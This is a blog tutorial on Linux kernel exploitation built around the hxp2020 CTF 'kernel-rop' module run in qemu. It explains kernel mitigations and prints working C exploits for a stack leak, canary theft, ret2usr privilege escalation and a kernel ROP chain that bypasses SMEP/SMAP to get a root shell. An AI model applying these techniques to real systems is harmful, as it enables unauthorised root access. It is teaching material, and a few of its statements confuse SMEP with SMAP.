Prelude

This blog post documents my forays into Linux kernel exploitation. The basis for this introduction is a challenge from the hxp2020 CTF called kernel-rop. If you want to follow along, you can either download it from the CTF page or from a local mirror.

There are already a lot of solutions to this challenge on the internet. If you came to my blog by looking for such a solution, you may be disappointed. This article is rather about Linux kernel exploitation in general and uses the challenge only as an example. The reason why I chose especially that challenge is that it seemed to be a good entrance to kernel exploitation.

At the end of this article you will know how common security mitigations in the kernel work and how to circumvent them. We are using qemu as emulator for the kernel and are writing an exploit for a custom kernel module. This setup is pretty common and the bug is easy to spot.

I used drafts of this blog post (and exercises derived thereof) to teach a workshop about linux kernel exploitation at my current company. I want to thank my colleagues for their valuable feedback which resulted in me rewriting some parts of this blog post, and also in enough pressure, to finally finish this post.

Setup

First, we unpack the .tar.gz from the CTF and take a look at the relevant files.

vmlinuz - This contains the actual Linux kernel image.
initramfs.cpio.gz - this contains the initial ramdisk. This is the filesystem that was compressed using cpio and gzip.
run.sh - This file contains the qemu command to run the vm.

What follows is a more in-depth view of the various files.

vmlinuz

This is the Linux kernel image. We can find out the version using file.

$ file vmlinuz
vmlinuz: Linux kernel x86 boot executable bzImage, version 5.9.0-rc6+ (martin@martin) #10 SMP Sun Nov 22 16:47:32 CET 2020, RO-rootFS, swap_dev 0X7, Normal VGA

The terminology here is that the z at the end indicates that it is compressed. This is usually done with gzip, bzip or lzma. The decompressed image is then called vmlinux. Decompression can be performed using a script from the linux kernel that is also locally mirrored here.

initramfs.cpio.gz

This is the initial ramdisk. It is gzipped and cpioed. gzip is a compression algorithm and should be known. cpio is an archival algorithm like tar. I encountered it back in the days when I was working as Linux sysadmin. It is a historic format, but is still used here.

We can unpack this using cat initramfs.cpio.gz | gunzip | cpio --extract. Probably we have to do this multiple times, so I found the following script.

#!/bin/bash
mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
cat initramfs.cpio.gz | gunzip | cpio -i && rm initramfs.cpio
popd

The content of the file system is shown in the following.

$ tree
.
├── bin
│   ├── busybox
│   └── sh -> busybox
├── etc
│   ├── init.d
│   │   └── rcS
│   ├── inittab
│   ├── motd
│   └── resolv.conf -> /proc/net/pnp
├── hackme.ko
├── init -> bin/busybox
├── root
├── sbin
└── usr
    ├── bin
    └── sbin

This is a Linux file system. motd contains a fun banner. hackme.ko is a kernel module that is vulnerable and needs to be hacked.

The file /etc/init.d/rcS contains the following important parts.

....
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms

insmod /hackme.ko
chmod 666 /dev/hackme

The command echo 1 > /proc/sys/kernel/kptr_restrict obscures the kernel pointers that are exposed via /proc and other interfaces. Basically it means that kernel pointers are “usually” replaced by zeroes.

The command echo 1 > /proc/sys/kernel/dmesg_restrict restricts unprivileged users from issuing dmesg to view the kernel log. We could set this to 0 to ease debugging.

The next line chmod 400 /proc/kallsyms sets restrictions to the file /proc/kallsyms. This file contains the kernel symbols and thus read access could be used to get valid pointers to the kernel address space.

Next, the vulnerable kernel module is loaded into the kernel using insmod /hackme.ko.

The command chmod 666 /dev/hackme sets the permissions on the device /dev/hackme. This is probably a device that serves as an interface to the vulnerable kernel module hackme.ko. Hence, the goal of the challenge is probably to read and write to that device and pwn the kernel in this way.

The file /etc/inittab contains the command setuidgid 1000 sh; This gives us a shell for the normal user. We can modify this to setuidgid 0 sh in order to get a root shell. If we boot the modified initramfs, we can then access files that are helpful in debugging the exploit such as /proc/kallsyms that contains the symbols of the kernel or /sys/module/core/sections/.text that contains the address of the .text section of the kernel.

We will have to compile an exploit, include it in initramfs, compress initramfs and then run the kernel. Then we have to test the exploit and if it does not work, do all the steps again. So here is a script to automate compilation, inclusion in initramfs and compressing initramfs. This script was found here.

#!/bin/bash

# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd

run.sh

This script runs the kernel and the initramfs within qemu. Its commented content is as follows.

#!/bin/sh
qemu-system-x86_64 \
    -m 128M \                     # the memory size
    -cpu kvm64,+smep,+smap \      # cpu model and enabling some mitigations
    -kernel vmlinuz \             # the kernel image
    -initrd initramfs.cpio.gz \   # the initial ramdisk
    -hdb flag.txt \         # use this file as harddisk image /dev/hdb
    -snapshot \             # write to temporary files and not disk images
    -nographic \            # disable graphical output. only command line
    -monitor /dev/null \    # redirect the monitor
    -no-reboot \            # exit instead of rebooting
    -append "console=ttyS0 kaslr kpti=1 quiet panic=1"
            # this last line specifies some boot options

As some of these arguments enable Kernel security mitigations, it is a natural next step in this exposition. Note that we can modify the mitigations within this command in order to have an easier time exploiting the kernel module.

But first a digression regarding remote debugging. If we append -s to the list of arguments, then qemu enables remote debugging on port 1234. We can connect to this port using the gdb debugger with the command target remote localhost:1234. If we add -S to the list of arguments of qemu, then the kernel is started in a suspended state. Within gdb, we can attach to this and start the kernel using continue or simply c. This allows debugging the kernel. This information is just for the sake of completeness. We do not make use of remote debugging in the remainder of this article.

Kernel Security Mitigations

As the run.sh script contained options that enable Kernel security mechanisms, we will next talk about these.

Kernel ASLR (Address Space Layout Randomization) - This is similar to ASLR in the user space. The objects in the kernel are loaded at random addresses in order to prevent using known offsets to jump to known function pointers.
SMEP (Supervisor Mode Execution Prevention) - All userland memory pages in the kernel are marked as non-executable when a process is in kernel mode. This prevents using code from user space in kernel exploits. If we want to have arbitrary code execution in the kernel, we need to reuse code that is already inside the kernel (i.e., using a ROP-chain with gadgets in the kernel). SMEP is enabled by setting the 20th bit of the CR4 control register of the processor.
SMAP (Supervisor Mode Access Prevention) - Similar to SMAP. It marks all userland memory pages as non-readable and non-writable when execution is in kernel land. While the other mitigations are common to Windows and Linux, SMAP is not implemented in Windows. Like SMAP, SMEP is enabled by setting the 21st bit of the CR4 control register of the processor.
KPTI (Kernel Page Table Isolation) - This is a further enhancement of SMEP/SMAP. User land and kernel land memory tables are isolated. One set of memory pages tables is used for running in kernel mode. This contains both user mode and kernel mode pages. A second set of memory page tables is used when running in user mode. It contains the full user land pages and a minimal needed set of kernel mode memory pages.

Reconnaissance

After we have our setup, a natural next step is looking at the vulnerability that we are going to exploit. We already know that it is residing within the hackme.ko kernel module. Hence, let us take a look at its properties.

$ rabin2 -I hackme.ko
arch     x86
baddr    0x8000000
binsz    317877
bintype  elf
bits     64
canary   true
injprot  false
class    ELF64
compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crypto   false
endian   little
havecode true
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  AMD x86-64 architecture
nx       false
os       linux
pic      false
relocs   true
relro    no
rpath    NONE
sanitize false
static   true
stripped false
subsys   linux
va       true

We can see that stack canaries are enabled in the kernel module. This is a mitigation against exploitation of buffer overflows. A fake value is inserted in the stack and when a function returns, the canary is checked for modifications. Modification corresponds to the detection of an exploit attempt and the kernel crashes the program.

Disassembling the kernel module, e.g., using Ghidra or r2 reveals multiple functions.

$ r2 -A initramfs/hackme.ko
...
 -- Remember to maintain your ~/.radare_history
[0x08000064]> afl
0x08000070    1     13 sym.hackme_release
0x08000080    8    174 sym.hackme_write
0x08000140    1     13 sym.hackme_open
0x08000150    5    174 sym.hackme_read
0x08000207    1     23 sym.hackme_init
0x0800021e    1     18 sym.hackme_exit

The functions hackme_init, hackme_exit, hackme_open, andhackme_release` are necessary for a kernel module. They are needed for loading and unloading the kernel module.

The function hackme_read is executed, when we read from /dev/hackme. The function hackme_write is executed, when we write to /dev/hackme.

Decompiling hackme_read using again Ghidra or r2 reveals the following.

ssize_t hackme_read(file *f,char *data,size_t size,loff_t *off)

{
  long lVar1;
  size_t sVar2;
  long in_GS_OFFSET;
  undefined local_a8 [8];
  int tmp [32];

  tmp._120_8_ = *(undefined8 *)(in_GS_OFFSET + 0x28);
  __memcpy(hackme_buf,local_a8);
  if (0x1000 < size) {
    __warn_printk("Buffer overflow detected (%d < %lu)!\n",0x1000,size);
    do {
      invalidInstructionException();
    } while( true );
  }
  __check_object_size(hackme_buf,size,1);
  lVar1 = _copy_to_user(data,hackme_buf,size);
  sVar2 = 0xfffffffffffffff2;
  if (lVar1 == 0) {
    sVar2 = size;
  }
  if (tmp._120_8_ == *(long *)(in_GS_OFFSET + 0x28)) {
    return sVar2;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

There is a 32-byte array on the stack tmp[32], but we can read up to 0x1000=4096 bytes. Thus, it allows to read further and hence leak the stack.

The function hackme_write is very similar. It allows to write up to 0x1000 bytes into a 32-byte array on the stack. Hence it allows to overflow the stack.

Leaking the Stack

As we can leak the stack using ``hackme_read`, we can also read the stack canary token. Our code is based on this awesome writeup.

We prepare a file called leak_stack.c. This can be compiled and packed in the initramfs using the script shown above in the setup paragraph.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;

void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_stack() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    for (int offset=0; offset < sz; offset++){
        printf("[+] offset %d contains value: 0x%lx \n", offset, leak[offset]);
    }
}


int main(int argc, char **argv) {
    open_dev();
    leak_stack();

    return 0;
}

Then, we can execute run.sh to start the kernel and drop into a shell within the qemu environment. If we included the compiled leak_stack.c correctly, we should find it in the root folder.

Its output looks as follows.

$ ./leak_stack
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] offset 0 contains value: 0xffffffffa773a630
[+] offset 1 contains value: 0x2a
[+] offset 2 contains value: 0x3d8f236e8e010100
[+] offset 3 contains value: 0xffff946086cae110
[+] offset 4 contains value: 0xffffad8e801bfe68
[+] offset 5 contains value: 0x4
[+] offset 6 contains value: 0xffff946086cae100
[+] offset 7 contains value: 0xffffad8e801bfef0
[+] offset 8 contains value: 0xffff946086cae100
[+] offset 9 contains value: 0xffffad8e801bfe80
[+] offset 10 contains value: 0xffffffffa728ab57
[+] offset 11 contains value: 0xffffffffa728ab57
[+] offset 12 contains value: 0xffff946086cae100
[+] offset 13 contains value: 0x0
[+] offset 14 contains value: 0x7ffe54601790
[+] offset 15 contains value: 0xffffad8e801bfea0
[+] offset 16 contains value: 0x3d8f236e8e010100
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 19 contains value: 0xffffad8e801bfed8
[+] offset 20 contains value: 0xffffffffa728565f
[+] offset 21 contains value: 0xffff946086cae100
[+] offset 22 contains value: 0xffff946086cae100
[+] offset 23 contains value: 0x7ffe54601790
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 26 contains value: 0xffffad8e801bff20
[+] offset 27 contains value: 0xffffffffa75a6507
[+] offset 28 contains value: 0xffffffffa7871d81
[+] offset 29 contains value: 0x0
[+] offset 30 contains value: 0x3d8f236e8e010100
[+] offset 31 contains value: 0xffffad8e801bff58
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 35 contains value: 0xffffad8e801bff30
[+] offset 36 contains value: 0xffffffffa776330a
[+] offset 37 contains value: 0xffffad8e801bff48
[+] offset 38 contains value: 0xffffffffa6e0a157

When looking at the stack, we can see three types of entities. There are arguments to functions at offset 1 and 5. Then, there are addresses starting with 0xffff. Thirdly, there are stack canaries. such as the one at offset 2, 16, or 30. Apparently, the one at offset 2 is a part of the uninitialized memory from the variable tmp[32] and not a canary, even though it looks like one.

This tutorial computes the offset of the stack canary simply through reverse engineering. This tutorial detects the stack canary automatically by assuming that it does not start with ffff and ends in 00.

Controlling RIP

As a next step, we want to check if we can control the instruction pointer RIP. As mentioned above, we can overwrite the stack using the function hackme_write. When this function is done, the stack is unwound. This means, that the previous stack context has to be recovered. RBX and RBP are so-called callee-saved registers. Hence, they have to be restored from the stack. Further, R12 is popped. I don’t know what R12 is good for, or why that happens, but this is the way things are. Finally, the instruction pointer RIP is popped.

So we can construct a payload and write it to /dev/hackme.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;


void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
}

void control_rip() {
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0x4444444444444444;  // RBX
    payload[cookie_off++] = (uint64_t) 0x4343434343434343;  // R12
    payload[cookie_off++] = (uint64_t) 0x4242424242424242;  // RBP
    payload[cookie_off++] = (uint64_t) 0x4141414141414141;  // RIP
    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}


int main(int argc, char **argv) {
    open_dev();
    leak_cookie();
    control_rip();

    return 0;
}

Again, we need to compile, compress the exploit into initramfs and start it with qemu using run.sh.

$ ./control_rip
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xa19c496548ccde00 at offset 16
[    4.268641] general protection fault: 0000 [#1] SMP PTI
[    4.269235] CPU: 0 PID: 113 Comm: control_rip Tainted: G           O      5.9.0-rc6+ #10
[    4.269605] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[    4.270271] RIP: 0010:0x4141414141414141
[    4.270653] Code: Bad RIP value.
[    4.271015] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[    4.271432] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[    4.271753] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[    4.272099] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[    4.272388] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[    4.272926] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[    4.273360] FS:  000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[    4.273834] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    4.274157] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
[    4.274665] Call Trace:
[    4.275780]  ? ksys_read+0xa7/0xe0
[    4.275933]  ? exit_to_user_mode_prepare+0x31/0x180
[    4.276170]  ? __x64_sys_read+0x1a/0x20
[    4.276376]  ? do_syscall_64+0x37/0x80
[    4.276564]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[    4.276865] Modules linked in: hackme(O)
[    4.277795] ---[ end trace 348a615b394120d4 ]---
[    4.278031] RIP: 0010:0x4141414141414141
[    4.278271] Code: Bad RIP value.
[    4.278463] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[    4.278747] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[    4.278999] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[    4.279286] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[    4.279604] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[    4.279952] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[    4.280318] FS:  000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[    4.280804] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    4.281200] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
Segmentation fault
...

We can clearly see that we control the return address RIP, as it contains 0x4141414141414141. This is so far with all mitigations still enabled. However, as we are in kernel mode it is not immediately clear how to exploit this fact.

Privilege Escalation Without Any Mitigations: Ret2Usr

In order to make out life easier, let us first disable the security mechanisms and try to exploit it. We can later add the security mechanisms again and built up to the full challenge.

Within run.sh instead of the last line -append "console=ttyS0 kaslr kpti=1 quiet panic=1" we write -append "console=ttyS0 nosmep nosmap nopti nokaslr quiet panic=1" in order to disable SMEP/SMAP, as well as KASLR and KPTI.

Now, we only have the stack canary to take care of. This is similar to userland exploitation with ROP chains. In userland, the goal is usually to spawn an elevated shell. In the kernel, it is the same.

There are two functions in the kernel, that are usually used for elevating privileges.

prepare_kernel_cred() - This kernel function prepares a set of credentials for a kernel service and can also override the credentials of a task for delegation purposes. If we call this with 0 as argument, the returned credentials have no group and full capabilities.
commit_creds() - This kernel function installs new credentials in the current thread.

Hence, the goal is to call commit_creds(prepare_kernel_cred(0)) using a ROP chain.

We can find the addresses of these functions inside the kernel by checking /proc/kallsyms. For this we modify /etc/inittab in the initramfs to contain setuidgid 0 sh. This will drop us to a root shell, so we are allowed to read /proc/kallsyms. Don’t forget to undo these changes, or you will wonder later why your privilege escalation always works without doing anything.

# id
uid=0 gid=0 groups=0
# cat /proc/kallsyms | grep -e prepare_kernel_cred -e commit_creds
ffff ffff 814c6410 T commit_creds
ffff ffff 814c67f0 T prepare_kernel_cred

So we have the addresses that we need to put on the ROP chain.

After elevating our privileges, we need to go back to user land. For this we need the assembly instruction swapgs with either iretq or sysretq.

swapgs - GS is one of the segment registers, such as CS (Code Segment), DS (Data Segment), or SS (Stack Segment). These registers point to the respective sections in the binary. The CS register points to the code segment in the binary, i.e., .text. The DS register points to the data segment .data in the binary and so on. When a context switch from user mode to kernel mode or back takes place, these registers just need to point to different memory addresses in order to facilitate this change. FS and GS are special registers in the CPU that can also be used for this context switch but whose purpose is not specified by the CPU manufacturer and thus can be chosen by the programmers of the operating system. FS and GS are used by Linux and Windows to access thread specific storage. As an example, in Windows, the Thread Environment Block (TEB) can be found at a fixed offset from GS or FS, depending on if the architecture is 32 or 64 bit. To make a long story short, we must swap the GS register when entering user mode from kernel mode or vice versa.
iretq/sysretq - Either of these functions need to be used to perform the actual context switch between kernel and user mode. iretq is easier to use, as it only requires the stack to be setup up with five registers for the userland in the order RIP, CS, RFLAGS, SP, SS. For sysretq we need to move the return address that should be in RIP in RCX. Further, sysretq moves RFLAGS to R11. The bits 48 to 63 of the register RIP need to be the same as bit
1. Otherwise, we get a general protection fault.

Executing these two instructions can be performed in our exploit code using inline assembly. We do not even need a ROP chain for that, as we have disabled SMEP/SMAP and thus can craft our chain inside user mode.

Note that when we revert back to user mode with iretq/sysretq we need to set the registers. Hence, before doing this dance, we have to store the userland registers in order to be able to revert them later.

This can be done as follows.

uint64_t user_cs, user_ss, user_rflags, user_sp;

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

Now we can put everything together. The following code is the full exploit for a kernel without any mitigations except stack canaries.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

void privesc(){
    __asm__(".intel_syntax noprefix;"
            "movabs rax, prepare_kernel_cred;"
            "xor rdi, rdi;"
            "call rax;"            // execute prepare_kernel_creds(0)
            "mov rdi, rax;"        // put the return value into rdi
            "movabs rax, commit_creds;"
            "call rax;"            // execute commit_creds
            "swapgs;"              // swap GS register
            "mov r15, user_ss;"    // restore the registers from user mode
            "push r15;"
            "mov r15, user_sp;"
            "push r15;"
            "mov r15, user_rflags;"
            "push r15;"
            "mov r15, user_cs;"
            "push r15;"
            "mov r15, user_rip;"   // return to the payload
            "push r15;"
            "iretq;"               // switch from kernel to userland
            ".att_syntax;");
}

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) privesc;  // RIP
    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

Executing this code looks as follows.

$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x2aa741ea8a7daa00 at offset 16
[+] we are root (uid = 0)
/ # id
uid=0 gid=0

As we see the message [+] we are root (uid = 0) in the output of our exploit, the elevation of privileges worked.

Note that in the payload we could instead of execl("/bin/sh", "sh", NULL); also write system("/bin/sh");. This solution can be found in different writeups, but in my tests, it did not work and lead to a segmentation fault. I have no idea why this does not work. If you read this and know why it happens, please let me know. I will edit this section when i find it out.

Adding SMEP/SMAP

Next, we will add the mitigations SMEP/SMAP and again try to exploit the kernel module. Remember that SMEP/SMAP stands for Supervisor Mode Access/Execution Prevention and marks memory pages from userland as non-accessible/executable, as long as we are in kernel mode. Hence, our exploit will not work anymore, as the inline assembly we wrote lives in user space, but we execute it from kernel mode. SMAP marks these pages as non-executable.

To enable SMEP/SMAP, we modify the last line of the original run.sh as follows: -append "console=ttyS0 nopti nokaslr quiet panic=1".

Running the previous exploit yields an error message.

$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xaeab3cc4e3107a00 at offset 16
[    4.726632] unable to execute userspace code (SMEP?) (uid: 1000)
[    4.727729] BUG: unable to handle page fault for address: 00000000004019bf
[    4.728668] #PF: supervisor instruction fetch in kernel mode
[    4.729483] #PF: error_code(0x0011) - permissions violation
[    4.730694] PGD 6119067 P4D 6119067 PUD 6118067 PMD 6163067 PTE 7919025
[    4.732670] Oops: 0011 [#1] SMP NOPTI
[    4.733963] CPU: 0 PID: 113 Comm: no_mitigations Tainted: G           O      5.9.0-rc6+ #10
[    4.734799] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[    4.736732] RIP: 0010:0x4019bf
[    4.737208] Code: Bad RIP value.
...

The important part is [4.726632] unable to execute userspace code (SMEP?) (uid: 1000). Well, we are doing kernel exploitation. The error messages are not getting any clearer than this.

In previous kernel versions up to around 2019 it was possible to disable SMEP/SMAP by using the kernel function native_write_cr4(). As SMEP and SMAP are activated by setting the 20th and 21st bit in the CR4 control register of the processor, it was possible to set those bits to zero and hence disable SMEP/SMAP. However, this was patched by pinning the bits so they cannot be changed anymore. Hence, this game plan does not work anymore.

Instead, we will craft a ROP chain using gadgets from the kernel only. This ROP chain will perform commit_creds(prepare_kernel_cred(0)), swapgs, and iretq. First we create a list of all gadget inside the kernel. Extract vmlinuz to vmlinux, as explained in the setup instructions above. There are multiple tools that can be used to extract ROP gadgets from vmlinux. ROPGadget (pip install ROPGadget) can be used with the command ROPgadget --binary vmlinux > gadgets.txt to find the gadgets. However, it does not seem to find gadgets containing iretq. There is also ropr (cargo install ropr) that is invoked using ropr --nouniq vmlinux > gadgets.txt We can also filter gadgets using, e.g., ropr --nouniq -R '^iretq' vmlinux Note that some of the gadgets that are found do not work as they are in memory that is marked as non-executable.

All that is left is creating a fake stack with the functions that we want to have executed. We then write to the device hackme.ko and overwrite the real stack with our fake stack. When the stack is unwound, our functions are executed.

Note that in the x64 calling convention, the arguments to functions are given in registers. The register RDI contains the first argument of a function. Hence, we write the value 0 in RDI and then call prepare_kernel_cred. The result is then returned in the register RAX, again according to the x64 calling convention.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_poprbp_ret = 0xffffffff8120109c; // swapgs; pop rbp; ret;
uint64_t iretq = 0xffffffff8100c0d9; //0xffffffff8225e3af; // iretq;

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to ebp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_poprbp_ret; // swapgs
    payload[cookie_off++] = (uint64_t) 0; // this is popped to rbp

    payload[cookie_off++] = (uint64_t) iretq;  // restore registers from user mode
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

Alternative way of bypassing SMEP but not SMAP

You may have noticed, that we bypassed both SMEP and SMAP. By building the ROP chain only from kernel gadgets, we did not need to either execute or access memory pages from user mode. But there are alternative approaches that can bypass SMEP, but not SMAP, one of which I want to touch on here. The idea is to pivot the stack to a location where we can write our ROP chain to. This is useful in the case where we can overwrite only the return address but not further.

There are a bunch of ROP gadgets that move a constant value into ESP. One such gadget is as follows.

uint64_t mov_esp_pop2_ret = 0xffffffff8196f56a; // mov esp, 0x5b000000 ; pop r12 ; pop rbp ; ret

